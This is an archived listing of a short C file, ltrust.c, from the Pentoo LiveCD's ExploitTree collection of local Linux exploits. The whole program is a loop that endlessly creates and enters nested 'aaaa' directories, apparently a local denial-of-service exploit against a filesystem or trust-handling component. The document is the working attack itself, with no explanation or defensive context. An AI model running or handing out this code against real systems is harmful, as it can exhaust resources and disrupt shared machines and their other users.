home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / ltrust.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  269b  |  23 lines

  1. #include <stdio.h>
  2. #include <sys/stat.h>
  3. #include <sys/types.h>
  4. #include <fcntl.h>
  5. #include <unistd.h>
  6.  
  7. int main(void)
  8. {
  9.  
  10. while(1) {
  11.     if(mkdir("aaaa",0777)<0) {
  12.         perror("mkdir");
  13.         exit(1);
  14.         }
  15.     if(chdir("aaaa")<0) {
  16.         perror("chdir");
  17.         exit(1);
  18.         }
  19.     }
  20.  
  21. return(0);
  22. }
  23.